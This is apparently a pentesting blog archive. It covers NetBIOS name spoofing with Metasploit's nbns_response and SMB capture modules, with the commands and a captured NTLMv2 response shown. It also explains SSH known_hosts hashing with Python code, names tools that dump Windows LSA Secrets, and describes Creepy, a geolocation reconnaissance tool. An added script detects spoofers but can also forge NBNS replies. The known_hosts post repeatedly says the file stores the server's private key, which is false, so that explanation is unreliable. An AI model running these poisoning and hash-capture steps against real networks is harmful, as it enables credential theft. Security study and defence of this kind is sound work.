Tag Archive: pentesting

NetBIOS spoofing

There have been several posts regarding NetBIOS spoofing, and I thought I would write something up about how it works.

When a Windows machine tries to access a resource on the network, it first has to resolve the name of that resource to an IP address. It does this by searching its hosts file first, and if that fails (which it generally does) it tries DNS. DNS doesn't have records for everything, so the Windows machine falls back to NetBIOS, and if you don't have a WINS server set up it sends a broadcast message asking whether anyone knows about that resource. Perfect: we can respond with a machine that we control.

How often do machines fall back to NetBIOS queries? Laptops that are members of a domain but sitting on a different (for example wireless) network often query for domain resources. Companies often have an internal website configured under a short name. Also, when you type something into the address bar, most web browsers first have to determine whether you are trying to access a local resource or performing a search, which triggers a lookup.

msf  auxiliary(smb) > use auxiliary/spoof/nbns/nbns_response
msf  auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the NB Name to determine if spoofed reply is sent
   SPOOFIP    yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data

msf  auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf  auxiliary(nbns_response) > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST           yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf  auxiliary(smb) > set JOHNPWFILE /pentest/passwords/wordlists/darkc0de.lst
JOHNPWFILE => /pentest/passwords/wordlists/darkc0de.lst
msf  auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf  auxiliary(smb) > [*] 2012-01-29 09:45:40 -0500
NTLMv2 Response Captured from
USER:keith DOMAIN:cheeze-it OS: LM:
NTHASH:******hash************* NT_CLIENT_CHALLENGE:****************************************************
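
The flip side for a defender is spotting a spoofer like the one above on your own segment. As an added example that is not from the original post or from Metasploit, the script below builds an NBNS query for a canary name that does not exist anywhere on the network and treats any positive reply to it as a spoofer; the packet builder, parser and the canary name are mine, following the RFC 1002 wire format. In a live check you would send build_query() to the subnet broadcast address on UDP 137 and pass whatever comes back to spoofer_ip().

```python
import ipaddress
import struct

# RFC 1002: a NetBIOS name is 16 bytes (15 chars space-padded + suffix byte);
# each nibble becomes 'A' + nibble, giving a 32-byte label with length byte and terminator.
NB_TYPE = 0x0020  # NB resource record type

def encode_nb_name(name, suffix=0x00):
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    enc = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return b"\x20" + enc + b"\x00"

def decode_nb_name(buf):  # buf[0:34] holds one encoded name; returns (name, suffix)
    enc = buf[1:33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15]

def build_query(name, trn_id):  # flags 0x0110: broadcast name query, recursion desired
    return (struct.pack(">HHHHHH", trn_id, 0x0110, 1, 0, 0, 0)
            + encode_nb_name(name) + struct.pack(">HH", NB_TYPE, 1))

def build_response(name, trn_id, ip):  # flags 0x8500: positive, authoritative answer
    rdata = struct.pack(">H", 0x0000) + ipaddress.IPv4Address(ip).packed  # NB_FLAGS + IPv4
    return (struct.pack(">HHHHHH", trn_id, 0x8500, 0, 1, 0, 0) + encode_nb_name(name)
            + struct.pack(">HHIH", NB_TYPE, 1, 300000, len(rdata)) + rdata)

def parse_answers(pkt):  # -> (trn_id, [(name, ip), ...]) for a response, None for a query
    trn_id, flags, qd, an, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000:
        return None
    off, answers = 12 + qd * 38, []  # skip echoed questions: 34-byte name + type + class
    for _ in range(an):
        name, _ = decode_nb_name(pkt[off:off + 34])
        rtype, _, _, rdlen = struct.unpack(">HHIH", pkt[off + 34:off + 44])
        rdata, off = pkt[off + 44:off + 44 + rdlen], off + 44 + rdlen
        if rtype == NB_TYPE:
            for i in range(0, rdlen, 6):  # each entry: 2 bytes NB_FLAGS + 4 bytes IPv4
                answers.append((name, str(ipaddress.IPv4Address(rdata[i + 2:i + 6]))))
    return trn_id, answers

def spoofer_ip(canary, trn_id, pkt):  # IP that claimed our canary name, else None
    parsed = parse_answers(pkt)
    if parsed is None or parsed[0] != trn_id:
        return None
    return next((ip for name, ip in parsed[1] if name == canary.upper()), None)
```

Any IP this returns is answering for a name nobody owns, which is exactly what the nbns_response module above does for every name matching its REGEX.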

SSH KnownHosts

When you SSH into a server, for whatever reason, Linux systems store the machine name/IP address and the private key. They do this so that if you get prompted for the public key again, either you are compromised and are part of a man-in-the-middle attack, or the private key on the server has changed. This information is stored in your user profile under .ssh/known_hosts.

For a pentester this information could be useful. If your password is compromised, an attacker can look at this file and see what machines you have SSHed into; would they be able to get in using the same username and password? Possibly. SSH has a newer feature where it will hash each entry. To enable it, put 'HashKnownHosts yes' in .ssh/config or in /etc/ssh/ssh_config (for all users). Then run 'ssh-keygen -H' to hash your current entries.

The '|' characters are separators; everything between them is a value. The first is the hash_magic (I'm not really sure what that is for), the second is the salt, encoded in base64, the third is the hashed IP/hostname, and the last is the private key for the host. The hostname/IP is hashed using SHA1 and the salt, then encoded in base64.
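
The hashed entry format above, as an added example that is not from the original post: in OpenSSH the salt is 20 random bytes and the hashed field is HMAC-SHA1 keyed with that salt over the hostname, which is what lets ssh (or ssh-keygen -F) check a name against an entry while the file itself gives the name away only to someone who guesses it and recomputes the hash per salt. The entry builder, the lookup and the key string below are mine; the key is a constructed placeholder, not a real host key.

```python
import base64
import hashlib
import hmac
import os

def hash_hostname(hostname, salt):
    # OpenSSH hashed host field: |1|base64(salt)|base64(HMAC-SHA1(key=salt, msg=hostname))
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(digest).decode())

def make_entry(hostname, keytype, key_b64, hashed=True):
    # With HashKnownHosts yes, ssh draws a fresh random 20-byte salt for every entry,
    # so two entries for the same host look unrelated and cannot be matched offline.
    field = hash_hostname(hostname, os.urandom(20)) if hashed else hostname
    return "%s %s %s" % (field, keytype, key_b64)

def entry_matches(line, hostname):
    # True if this known_hosts line is for hostname: plain name, comma-separated list,
    # or hashed form (recompute the HMAC with the entry's own salt and compare).
    fields = line.split()
    if len(fields) < 3 or fields[0].startswith("#"):
        return False
    hostfield = fields[0]
    if hostfield.startswith("|1|"):
        _, _, salt_b64, _ = hostfield.split("|")
        expected = hash_hostname(hostname, base64.b64decode(salt_b64))
        return hmac.compare_digest(expected, hostfield)
    return hostname in hostfield.split(",")

def entries_for_host(lines, hostname):
    # The only way to find a host in a hashed file: name it and test each entry's salt.
    return [line for line in lines if entry_matches(line, hostname)]
```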

Windows has two types of security, local and domain. LSA, or Local Security Authority, is defined by Microsoft as "A protected subsystem that authenticates and logs users onto the local system. LSA also maintains information about all aspects of local security on a system, collectively known as the Local Security Policy of the system. In addition to housing policy information, the LSA provides services for translation between names and security identifiers (SIDs)." The process responsible for this is the Local Security Authority Subsystem Service (LSASS.EXE).

The private database for LSA is called LSA Secrets, and it is stored under HKEY_LOCAL_MACHINE\Security\Policy\Secrets. These registry values are all encrypted, but you should be able to find software that allows you to view this information; LSADump, LSASecretsDump, pwdumpx, gsecdump and Cain & Abel are just a few that can.


Tool: Creepy

Creepy is a utility written in Python that gathers geolocation data from various social networking and image hosting services and presents it on a map inside the application. It is a useful utility in the information gathering stage for pentesters or social engineers. Go to the tool's website for more information or to download the application.